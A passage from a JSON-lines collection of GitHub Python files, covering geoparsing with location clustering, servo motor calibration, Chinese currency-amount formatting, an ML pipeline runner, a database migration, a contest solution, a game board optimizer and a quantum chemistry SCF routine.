document_results[i][\"CLUSTER\"] = clusters.labels_[i]\n\n        for group in range(n_groups):\n            self.debug(f\"filtering group {group}...\")\n            max_cluster_size = -1\n            max_cluster_result = None\n            for result in document_results:\n                if result[\"GROUP\"] != group:\n                    continue\n                self.debug(f\"checking result {str(result)}\")\n                cluster = result[\"CLUSTER\"]  # the cluster label was stored above; indexing labels_ with it again would be wrong\n                if cluster_sizes[cluster] > max_cluster_size:\n                    max_cluster_size = cluster_sizes[cluster]\n                    max_cluster_result = result\n\n            if max_cluster_result is not None:\n                self.debug(f'max result for group {group} was from cluster {max_cluster_result[\"CLUSTER\"]}')\n                final_document_results.append(max_cluster_result)  # keep only the largest-cluster result for this entity\n        self.debug(\"finished finalizing results...\")\n        self.debug(f\"{str(document_results)}\")\n        with open(f\"{self.output_path}/{basename}_final_results.txt\", \"w+\", encoding=\"utf8\") as f:\n            f.write(str(final_document_results))\n\n    def get_cluster_sizes(self, clusters):\n        cluster_sizes = [0] * clusters.n_clusters\n        for label in clusters.labels_:\n            cluster_sizes[label] += 1\n        return cluster_sizes\n\n    \"\"\"\n    Given a list of results in the format returned by 'get_geoname_hierarchy', will find the region\n    where the most entities reside and filter out entities not in that region. Level is the key for the\n    dictionary that indicates the regional level to filter. Works with \"CONT\" and \"PCLI\"\n    \"\"\"\n\n    def remove_region_outliers(self, doc_results, level):\n        self.debug(f\"Removing {level} outliers\")\n        cont_counts = {}\n        max_val = 1\n        num_results = len(doc_results)\n        for result in doc_results:\n            if result[level] in cont_counts.keys():\n                cont_counts[result[level]] += 1\n                if cont_counts[result[level]] > max_val:\n                    max_val = cont_counts[result[level]]\n            else:\n                cont_counts[result[level]] = 1\n\n        self.debug(f\"counts: {cont_counts}\")\n        filtered_results = []\n        for result in doc_results:\n            if cont_counts[result[level]] >= max_val * LOCATION_SIZE_THRESHOLD:\n                filtered_results.append(result)\n                self.debug(\"added to result\")\n        return filtered_results\n\n    \"\"\"\n    Given the geoname id of a location, will construct a dictionary that contains the ID, CONT, PCLI, LAT, and LNG\n    of the location from geonames and return the dictionary. 
If any of those fields aren't available from geonames,\n    then None is returned\n    \"\"\"\n\n    def get_geoname_hierarchy(self, id):\n        result = {\"ID\": id, \"CONT\": None, \"PCLI\": None, \"LAT\": -1, \"LNG\": -1}\n        r = requests.get(GEONAME_URL.format(id))\n        if r.status_code != 200:\n            print(f\"Invalid status code returned! {r.status_code}\")\n            GEONAME_BREAKER = True\n            exit()\n\n        if \"geonames\" in json.loads(r.text):\n            data = json.loads(r.text)[\"geonames\"]\n            if len(data) == 0:\n                return None\n        else:\n            return None\n\n        result[\"LAT\"] = data[-1][\"lat\"]\n        result[\"LNG\"] = data[-1][\"lng\"]\n        admin = \"\"\n        for name in data:\n            if \"fcode\" in name.keys() and name[\"fcode\"] == \"CONT\":\n                result[\"CONT\"] = name[\"name\"]\n            elif \"fcode\" in name.keys() and name[\"fcode\"] == \"PCLI\":\n                result[\"PCLI\"] = name[\"name\"]\n            elif \"fcode\" in name.keys() and name[\"fcode\"] == \"ADM1\":\n                admin = name[\"name\"]\n        if result[\"PCLI\"] == \"United States\":\n            result[\"PCLI\"] = admin\n        if result[\"CONT\"] is None or result[\"PCLI\"] is None:\n            self.debug(\"Got NONE result\")\n            return None\n        else:\n            return result\n\n\n    def cluster_locations(self, X):\n        # X is a 2xN (np) matrix of points\n\n        clusters = None\n        self.debug(f\"Fitting points: {X}\")\n        n_clusters = int(X.shape[0] * NUM_CLUSTERS_PERCENT)\n        ward = AgglomerativeClustering(n_clusters=n_clusters, linkage='ward')\n        try:\n            clusters = ward.fit(X)\n        except:\n            self.debug(\"Couldn't cluster locations!\")\n        return clusters\n\n    # reranked is a dictionary mapping locations to lists of reranked tuples of locations\n    # only keeps the closest matches\n    # \"location\": [(loc1, geonorm_id), ...]\n    def rerank_results(self, output):\n        locations = output.split(\"\\n\\n\")\n        reranked = {}\n        for loc in locations:\n            reranked.update(self.rerank_location(loc.strip()))\n        return reranked\n\n    def rerank_location(self, output):\n        lines = output.split(\"\\n\")\n        selected_locs = [(loc.split(\":\")[0].strip(), loc.split(\":\")[1].strip()) for loc in lines[1:]]\n\n        results = []\n        for loc in selected_locs:\n            similarity = fuzz.ratio(lines[0].strip(), loc[0]) / 100  # fuzz.ratio returns 0-100; normalize so the 0.85 threshold is meaningful\n            # Ignore results that are too different from the parsed entity\n            if similarity >= FUZZY_SIMILARITY_THRESHOLD:\n                results.append((loc[0], loc[1]))\n\n        results.sort(key=lambda x: x[1], reverse=True)\n        result_dict = {lines[0].strip(): results}\n        return result_dict\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) <= 1:\n        print(\"Too few arguments given!\")\n        ner = NER(\"test/\", \"./output/\")  # __init__ requires an output path; use the same default as below\n    else:\n        path = sys.argv[1]\n        outpath = sys.argv[2] if len(sys.argv) == 3 else \"./output/\"\n        ner = NER(path, outpath)\n","repo_name":"ngds/geoparse-rerank","sub_path":"NER.py","file_name":"NER.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42785906821","text":"import pypot.dynamixel as pd\nimport time\n\n# get ports and start connection to motors\nports = pd.get_available_ports()\nmotors = pd.Dxl320IO(ports[0],1000000)\n\nmotor_id = motors.scan(range(20))\n\n# only work with one motor at a time\nif (len(motor_id)>1):\n    print(\"Only connect one motor at a time!\")\n    quit()\n\nif (len(motor_id)<1):\n\tprint(\"No connected motors found! Did you remember to connect external power?\")\n\tquit()\n\t\nmotor_id = motor_id[0]\n\nprint(\"Motor \"+str(motor_id)+\" found!\")\n\nnew_id_str = input(\"Enter motor ID (1-3 for towers, 4 for base, 5+ for etc). 
Press enter to leave the ID as is: \")\n\nif new_id_str != '':\n new_id = int(new_id_str)\n motors.disable_torque([motor_id])\n print(\"Changing motor ID changed from \"+str(motor_id)+\" to \"+str(new_id))\n motors.change_id({motor_id:new_id})\n time.sleep(0.2)\n\n if (motors.ping(new_id) == True):\n motor_id = new_id\n else:\n print(\"Sorry, didn't work. Unplug and replug the motor and run again.\")\n\n# set motor to 100\nmotors.set_goal_position({motor_id:100})\ninput(\"Motor position: 100; Attach horn then press 'Enter'. \")\n\n# set motor to 0\nmotors.set_goal_position({motor_id:0})\ninput(\"Motor position: 0; Calibrate string length then press 'Enter'. \")\n\n# set motor back to 100\nmotors.set_goal_position({motor_id:100})\nprint(\"Motor position: 100; Calibration complete!\")\n\nquit()\n","repo_name":"hrc2/blossom-public","sub_path":"motor_calib.py","file_name":"motor_calib.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"2587819313","text":"#!/usr/bin/env python\nimport math\nimport sys\nfrom typing import Callable, Generator, Optional\n\n\ndef convert(num: float) -> Optional[str]:\n \"\"\"转换数字为规范的书写格式\"\"\"\n splited = _split(num)\n if splited is None:\n return None\n integer, (frac0, frac1) = splited\n\n # 超过 9999_9999_9999_9999\n if len(integer) > 16:\n return None\n\n chunks = []\n for chunk in _cut(integer):\n chunks.append(chunk)\n\n result = \"\"\n suffix = [\"仟\", \"佰\", \"拾\", \"\"]\n transer = [\"零\", \"壹\", \"贰\", \"叁\", \"肆\", \"伍\", \"陆\", \"柒\", \"捌\", \"玖\"]\n primarys = [\"万亿\", \"亿\", \"万\", \"\"]\n\n # 待填入 0 标志\n is_zero = False\n for i, chunk in enumerate(chunks[::-1]):\n index = 4 - len(chunks) + i\n tmp, (start_zero, end_zero) = _convert_chunk(\n chunk, suffix, transer, primarys[index]\n )\n\n # 稍后再填入 0,因为可能无需填 0\n if not tmp:\n is_zero = True\n continue\n\n if i > 0 and (is_zero or start_zero):\n result += \"零\"\n\n result += tmp\n\n # 尾部含 0 即待填入 0\n is_zero = end_zero\n\n full_zero = integer[-1] == 0 and len(integer) == 1\n if not full_zero:\n result += \"圆\"\n\n if not full_zero and frac0 == 0 and frac1 == 0:\n result += \"整\"\n return result\n\n if frac0 != 0:\n result += f\"{transer[frac0]}角\"\n\n if frac1 != 0:\n result += f\"{transer[frac1]}分\"\n\n return result\n\n\ndef _split(num: float) -> Optional[tuple[list[int], tuple[int, int]]]:\n \"\"\"将数字划分为小数和整数部分,保留两位小数,不足补 0\"\"\"\n if not math.isfinite(num) or num < 0:\n return None\n\n tmp = f\"{num}\"\n snum = tmp.split(\".\")\n\n _integer = list(snum[0])\n integer = [int(x) for x in _integer]\n if len(snum) == 2:\n fracs = snum[1]\n if len(fracs) == 2:\n return integer, (int(fracs[0]), int(fracs[1]))\n\n return integer, (int(fracs[0]), 0)\n return integer, (0, 0)\n\n\ndef _convert_chunk(\n chunk: list[int], suffix: list[str], transer: list[str], primary: str\n) -> tuple[str, tuple[bool, bool]]:\n \"\"\"将 4 位数字转化为指定格式,并返回头部和尾部是否为 0\"\"\"\n result = \"\"\n\n if len(set(chunk)) == 1 and chunk[0] == 0:\n return result, (True, True)\n\n make_unit: Callable[[int], str] = lambda i: transer[chunk[i]] + suffix[i]\n\n zero = False\n if chunk[0] != 0:\n result = make_unit(0)\n zero = True\n\n if chunk[1] != 0:\n result += make_unit(1)\n zero = True\n elif zero and (chunk[2] != 0 or chunk[3] != 0):\n result += \"零\"\n zero = False\n\n if chunk[2] != 0:\n result += make_unit(2)\n elif zero and chunk[3] != 0:\n result += \"零\"\n\n if chunk[3] != 0:\n result += make_unit(3)\n\n result += primary\n return result, 
(chunk[0] == 0, chunk[3] == 0)\n\n\ndef _cut(some: list[int]) -> Generator[list[int], None, None]:\n \"\"\"将给定 list 切分为长度为 4 的 list,逆序,不足补 0\"\"\"\n while len(some) > 4:\n yield some[-4:]\n some = some[:-4]\n\n yield [0] * (4 - len(some)) + some\n\n\ndef main() -> None:\n if len(sys.argv) != 2:\n _help(sys.argv[0])\n return\n\n result = convert(float(sys.argv[1]))\n if result:\n print(result)\n return\n\n print(\"转换失败\")\n\n\ndef _help(name: str) -> None:\n print(f\"用法: {name} <数字>\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nidhoggfgg/mini-projects","sub_path":"convert-money/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"4836293344","text":"from cnnClassifier import logger\nfrom cnnClassifier.pipeline.stage_01_data_ingestion import DataIngestionTrainingPipeline\nfrom cnnClassifier.pipeline.stage_02_prepare_base_model import PrepareBaseModelTrainingPipeline\nfrom cnnClassifier.pipeline.stage_03_training import ModelTrainingPipeline\nfrom cnnClassifier.pipeline.stage_04_evaluation import EvaluationPipeline\n\n\nSTAGE_NAME = \"Data Ingestion stage\"\ntry:\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\") \n data_ingestion = DataIngestionTrainingPipeline()\n data_ingestion.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\nSTAGE_NAME = \"Prepare base model\"\ntry: \n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n prepare_base_model = PrepareBaseModelTrainingPipeline()\n prepare_base_model.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\nSTAGE_NAME = \"Training\"\ntry: \n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n model_trainer = ModelTrainingPipeline()\n model_trainer.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n\n\nSTAGE_NAME = \"Evaluation stage\"\ntry:\n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n model_evalution = EvaluationPipeline()\n model_evalution.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\n\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n","repo_name":"krishnaik06/Chicken-Disease-Classification-Projects","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"23584926351","text":"import heapq as hq\r\n\r\n\r\ndef solve(N, Q, horse_distances, horse_speeds, city_distances, pairs):\r\n out = []\r\n for start_city, end_city in pairs:\r\n start_city -= 1\r\n end_city -= 1\r\n # tup = (time, city_id, current_horse_distance_remain, current_horse_speed)\r\n heap = [(0., start_city, 0., 1.)]\r\n reached_cities = set()\r\n reached_cities_top_horses = dict()\r\n while True:\r\n time, city_id, current_horse_distance_remain, current_horse_speed = hq.heappop(heap)\r\n if city_id == end_city:\r\n break\r\n if city_id in reached_cities:\r\n good_horse = False\r\n for top_horse_dist, top_horse_speed in reached_cities_top_horses[city_id]:\r\n if 
current_horse_distance_remain > top_horse_dist or current_horse_speed > top_horse_speed:\r\n good_horse = True\r\n if good_horse is False:\r\n continue\r\n new_top_horses = [(current_horse_distance_remain, current_horse_speed)]\r\n for top_horse in reached_cities_top_horses[city_id]:\r\n if top_horse[0] > current_horse_distance_remain or top_horse[1] > current_horse_speed:\r\n new_top_horses.append(top_horse)\r\n reached_cities_top_horses[city_id] = new_top_horses\r\n else:\r\n reached_cities.add(city_id)\r\n reached_cities_top_horses[city_id] = [(current_horse_distance_remain, current_horse_speed)]\r\n\r\n new_horse_d = horse_distances[city_id]\r\n new_horse_s = horse_speeds[city_id]\r\n for to_id, dist in enumerate(city_distances[city_id]):\r\n if dist == -1:\r\n continue\r\n if dist <= current_horse_distance_remain:\r\n hq.heappush(heap, (time + dist * 1. / current_horse_speed, to_id, current_horse_distance_remain - dist, current_horse_speed))\r\n if dist <= new_horse_d:\r\n hq.heappush(heap, (time + dist * 1. / new_horse_s, to_id, new_horse_d - dist, new_horse_s))\r\n out.append(str(time))\r\n return ' '.join(out)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n output = []\r\n fname = 'C-small-attempt2'\r\n with open(fname + '.in') as f:\r\n inputs = [line.strip() for line in f]\r\n\r\n num_cases = int(inputs[0])\r\n line = [1]\r\n\r\n def next_line():\r\n text = inputs[line[0]]\r\n line[0] += 1\r\n return text\r\n\r\n for i in range(num_cases):\r\n N, Q = map(int, next_line().split())\r\n horse_distances = []\r\n horse_speeds = []\r\n for _ in range(N):\r\n dist, speed = map(int, next_line().split())\r\n horse_distances.append(dist)\r\n horse_speeds.append(speed)\r\n city_distances = []\r\n for _ in range(N):\r\n city_distances.append(list(map(int, next_line().split())))\r\n pairs = []\r\n for _ in range(Q):\r\n u, v = map(int, next_line().split())\r\n pairs.append((u, v))\r\n\r\n print(i + 1)\r\n output.append(\"Case #%d: \" % (i + 1) + str(solve(N, Q, horse_distances, horse_speeds, city_distances, pairs)))\r\n\r\n with open(fname + '.out', 'w') as f:\r\n f.write('\\n'.join(output))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/315.py","file_name":"315.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25597487515","text":"from typing import Tuple\nfrom .cogs import Cog, EmptyCog, Player\nfrom .special_cogs import BoostedCog\nimport numpy as np\n\nclass Board:\n def __init__(self, height: int = 8, width: int = 12, locked: bool = True) -> None:\n self._visualization_board = ''\n self.board = np.array([[EmptyCog() for w in range(width)] for h in range(height)])\n if locked:\n self.mask = np.zeros_like(self.board)\n else:\n self.mask = np.ones_like(self.board)\n self.storage = []\n self.total_build = 0\n self.total_flaggy = 0\n self.total_exp = 0\n\n def unlock(self, mask: np.array):\n assert mask.shape == self.board.shape, \"Mask shape is different than board shape!\"\n self.mask = mask\n \n def empty(self) -> bool:\n for cog in self.board.flatten():\n if not isinstance(cog, EmptyCog):\n return False\n return True\n\n def place(self, x:int, y:int, cog: Cog = EmptyCog()) -> None:\n if self.validate(x, y):\n assert isinstance(cog, Cog), \"You can't place non-cogs on board!\"\n if not isinstance(self.board[y, x], EmptyCog):\n self.storage.append(self.board[y, x])\n self.board[y,x] = cog\n \n def clear(self):\n self.reset_board_values()\n for x in 
range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n self.place(x, y, EmptyCog())\n\n def reset_board_values(self):\n self.total_build = 0\n self.total_flaggy = 0\n self.total_exp = 0\n\n def validate(self, x, y) -> bool:\n return (x >= 0 and y >= 0 and x < self.board.shape[1] and y < self.board.shape[0]) and (self.mask[y, x])\n\n def get_totals(self) -> Tuple[int, int, int]:\n return self.total_build, self.total_flaggy, self.total_exp\n\n def calculate_board(self):\n self.reset_loop()\n self.multiply_loop()\n self.sum_loop()\n\n def reset_loop(self):\n self.reset_board_values()\n for c in self.board.flatten():\n c.reset()\n\n def multiply_loop(self):\n for x in range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n if self.validate(x, y):\n c = self.board[y, x]\n if isinstance(c, BoostedCog):\n boosted_coordinates, boosted_values = c.boosted()\n for bc in boosted_coordinates:\n dx, dy = bc[0], bc[1]\n \n if self.validate(x+dx, y+dy):\n boosted_cog = self.board[y+dy, x+dx]\n boosted_cog.apply_boost(*boosted_values)\n self.board[y+dy, x+dx] = boosted_cog\n \n def sum_loop(self):\n for x in range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n if self.validate(x, y):\n c = self.board[y, x]\n self.total_build +=c.get_values()[0]\n self.total_flaggy += c.get_values()[1]\n self.total_exp += c.get_values()[2]\n\n def show(self):\n self.print_rates()\n self.print_board()\n self.print_storage()\n self.print_players_info()\n\n def print_rates(self):\n print(\"Total build rate: \" + str(self.total_build) + '\\n' +\n \"Total flaggy rate: \" + str(self.total_flaggy) + '\\n' +\n \"Total extra exp: \" + str(self.total_exp))\n\n def print_board(self):\n board_print = ''\n for y in range(self.board.shape[0]):\n for x in range(self.board.shape[1]):\n board_print += str(self.board[y, x]) + '\\t'\n board_print = board_print[:-1] + '\\n'\n self._visualization_board = board_print\n print(self._visualization_board)\n \n def print_storage(self):\n storage_print = 'In storage: '\n for s in self.storage:\n storage_print += str(s) + ', '\n print(storage_print)\n\n def print_players_info(self):\n print('Player stats:')\n for c in self.board.flatten():\n if isinstance(c, Player):\n print(c.info())","repo_name":"Belvenix/IdleonCogOptimizer","sub_path":"src/python/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35280328063","text":"\"\"\"staff remarks\n\nRevision ID: b5578f6deba6\nRevises: 7f01a013a976\nCreate Date: 2021-06-10 23:00:12.600023\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b5578f6deba6'\ndown_revision = '7f01a013a976'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n staff_remark_codes = op.create_table('staff_remark_codes',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('description', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code')\n )\n\n op.bulk_insert(\n staff_remark_codes,\n [\n {\n \"code\": \"BLANKAFFIDAVIT\",\n \"description\": \"Affidavit is blank / affidavit is not attached\",\n \"default\": False\n },\n {\n \"code\": \"MISSINGSEAL\",\n \"description\": \"Affidavit is missing seal\",\n \"default\": False\n },\n {\n \"code\": \"INCOMPLETE\",\n \"description\": \"One or more required fields is incomplete\",\n \"default\": False\n },\n {\n \"code\": \"NOTPRACTICING\",\n \"description\": \"Lawyer/notary is not practicing\",\n \"default\": False\n },\n {\n \"code\": \"NAMEMISMATCH\",\n \"description\": \"User profile name does not match the name on the affidavit\",\n \"default\": False\n },\n ]\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('staff_remark_codes')\n # ### end Alembic commands ###\n","repo_name":"bcgov/sbc-auth","sub_path":"auth-api/migrations/versions/b5578f6deba6_staff_remarks.py","file_name":"b5578f6deba6_staff_remarks.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"2841273676","text":"from __future__ import division\nfrom __future__ import print_function\n\nfrom ctypes import *\nimport numpy as np\nimport napmo\n# import matplotlib.pyplot as plt\n\nimport sys\nfrom scipy import linalg as SLA\n\n\nclass SCF(object):\n \"\"\"\n SCF Implementation\n\n Args:\n options (dict): Options to handle the SCF calculation\n pce (double) : Point charges energy\n \"\"\"\n\n def __init__(self, options=None, pce=0.0, pprint=True):\n super(SCF, self).__init__()\n self.options = {'maxiter': 100,\n 'eps_e': 1e-7,\n 'eps_n': 1e-7,\n 'eps_d': 1e-7,\n 'method': 'hf',\n 'kind': 'analytic',\n 'direct': False,\n 'print': True,\n 'debug': False}\n\n if options:\n self.options.update(options)\n\n if self.get('kind') == 'numeric':\n self.options['print'] = False\n\n if pprint:\n print(self)\n\n self._energy = 0.0\n self._pce = pce\n\n if pprint:\n print(\"Point charges energy: {0:<12.8f}\".format(self._pce))\n\n def iteration_single(self, psi, pprint=False):\n \"\"\"\n Performs a single iteration for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n \"\"\"\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid()\n psi.compute_xc_matrix()\n\n psi.build_fock()\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n self._energy = psi._energy + psi.pce\n\n if pprint:\n print('Single iteration {0:<3s} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(psi.symbol, psi._energy, self._energy, psi._rmsd))\n\n def single(self, psi, pprint=False, diis=True, other_psi=None):\n \"\"\"\n Perform SCF procedure for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint:\n print('\\nStarting Single SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s} {4:>12s}'\n .format(\"\\nIter\", \"E (\" + psi.symbol + \")\", \"Total E\", \"Delta(E)\", \"RMS(D)\"))\n\n iterations = 0\n 
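# e_diff starts above eps_e (default 1e-7) so the convergence loop runs at least once;\n        # it exits when |Delta(E)| and the density RMSD are both below tolerance, or at maxiter\n        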
e_diff = 1\n\n while (iterations < self.get('maxiter') and\n (np.abs(e_diff) > self.get('eps_e') or\n np.abs(psi._rmsd) > self.get('eps_d'))):\n\n iterations += 1\n e_last = psi._energy\n\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid()\n psi.compute_xc_matrix()\n\n if other_psi is not None:\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(other_psi, direct=self.get('direct'))\n\n psi.build_fock()\n\n # Iterate\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n if diis:\n with napmo.runtime.timeblock('DIIS'):\n napmo.cext.LibintInterface_diis(psi._diis, byref(psi))\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n e_diff = psi._energy - e_last\n\n self._energy = psi._energy + psi.pce\n\n # print results\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12.7f}'.\n format(iterations, psi._energy, self._energy, e_diff, psi._rmsd))\n\n # Debug info\n if self.get('debug') and not isinstance(psi, napmo.PSIO):\n if not isinstance(psi, napmo.PSIO):\n print('{0:11s} {1:>16.10f}'.format(\"ANALYTICAL \", self._energy))\n grid = napmo.BeckeGrid(psi.species, 500, 110)\n psi.plot_dens(grid=grid, kind=\"anal\")\n # plt.show()\n\n def multi(self, PSI, pprint=True, case=0):\n \"\"\"\n Perform SCF iteration for all species in this object.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint and case == 0:\n print('\\nStarting Multi SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n if pprint and case > 0:\n print('\\nRestarting Multi SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 0\n e_diff = 1\n\n # Initialization\n beta_psi = [\n psi for psi in PSI if psi.symbol == 'e-beta'\n ][0] if self.options.get('spin', '') == 'polarized' else None\n\n for psi in PSI:\n # Calculate 2 body Matrix\n psi.compute_2body(self.get('direct'))\n psi.compute_coupling(PSI, direct=self.get('direct'))\n psi.compute_xc_grid(beta_psi)\n\n # XC grid must be calculated for all species before calculating\n # interspecies correlation\n for psi in PSI:\n psi.compute_c_2species_grid(PSI)\n\n for psi in PSI:\n psi.compute_xc_matrix()\n psi.build_fock()\n # self.compute_energy_single(psi, show=True)\n\n while (iterations < self.get('maxiter') and\n np.abs(e_diff) > self.get('eps_e')):\n\n iterations += 1\n\n e_last = self._energy\n\n if case == 0:\n\n for psi in PSI:\n psi.build_fock()\n\n # Iterate\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n # Update Matrices\n for psi in PSI:\n\n # Calculate 2 body Matrix\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid(beta_psi)\n\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n psi.compute_c_2species_grid(PSI)\n\n # XC Matrix, DFT Case\n for psi in PSI:\n psi.compute_xc_matrix()\n\n # if case is 1:\n # for psi in PSI:\n\n # with 
napmo.runtime.timeblock('2 body ints'):\n # psi.compute_2body(self.get('direct'))\n # psi.compute_xc(beta_psi)\n\n # psi.build_fock()\n\n # # solve F C = e S C\n # with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n # napmo.cext.wavefunction_iterate(byref(psi))\n\n # with napmo.runtime.timeblock('Coupling ints'):\n # psi.compute_coupling(PSI, direct=self.get('direct'))\n # # psi.compute_cor2species(PSI)\n\n # self.single(psi, pprint=False)\n\n # if self.get('debug'):\n # print(\"Single particle energy for \" +\n # psi.symbol + \":\", psi._energy + psi.pce)\n\n # if case is 2:\n # print('\\n Calculation does not converge!')\n # return\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff))\n\n # if iterations >= self.get('maxiter'):\n # case += 1\n # self.multi(PSI, case=case)\n # return\n\n # Debug\n if self.get('debug'):\n print('{0:11s} {1:>16.10f}'.format(\"\\nANALYTICAL \", self._energy))\n for psi in PSI:\n grid = napmo.BeckeGrid(psi.species, 100, 110)\n psi.plot_dens(grid, kind=\"anal\")\n # plt.show()\n # plt.savefig('analytic_dens.png')\n\n def nsingle(self, psi, pprint=True):\n \"\"\"\n Perform Numerical SCF procedure for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint:\n print('\\nStarting Single NSCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s} {4:>12s}'\n .format(\"\\nIter\", \"E (\" + psi.symbol + \")\", \"Total E\", \"Delta(E)\", \"Delta(Orb)\"))\n\n iterations = 1\n e_diff = 1.0\n psi._rmsd = 1.0\n e_last = psi._energy\n\n converged = False\n while (not converged):\n\n e_last = psi._energy\n\n if iterations > 1:\n with napmo.runtime.timeblock('PSI optimization'):\n # Compute new psi\n psi.optimize_psi()\n\n with napmo.runtime.timeblock('Numerical 2 body'):\n psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n\n psi.build_fock()\n\n # if iterations > 2:\n # psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n # else:\n # psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n e_diff = psi._energy - e_last\n\n self._energy = psi._energy + psi.pce\n\n # print results\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12.7f}'.\n format(iterations, psi._energy, self._energy, e_diff, psi._optimize.delta_orb.sum()))\n\n if iterations > self.get('maxiter') or np.abs(e_diff) < self.get('eps_n'):\n if iterations > 1:\n converged = True\n\n iterations += 1\n\n # Debug\n if self.get('debug') and not isinstance(psi, napmo.PSIO):\n if not isinstance(psi, napmo.PSIO):\n psi.plot_dens(kind=\"num\")\n # plt.show()\n\n def nmulti(self, PSI, pprint=True):\n \"\"\"\n Perform SCF iteration for all species in this object.\n \"\"\"\n\n if pprint:\n print('\\nStarting Multi NSCF Calculation...')\n print('{0:5s} 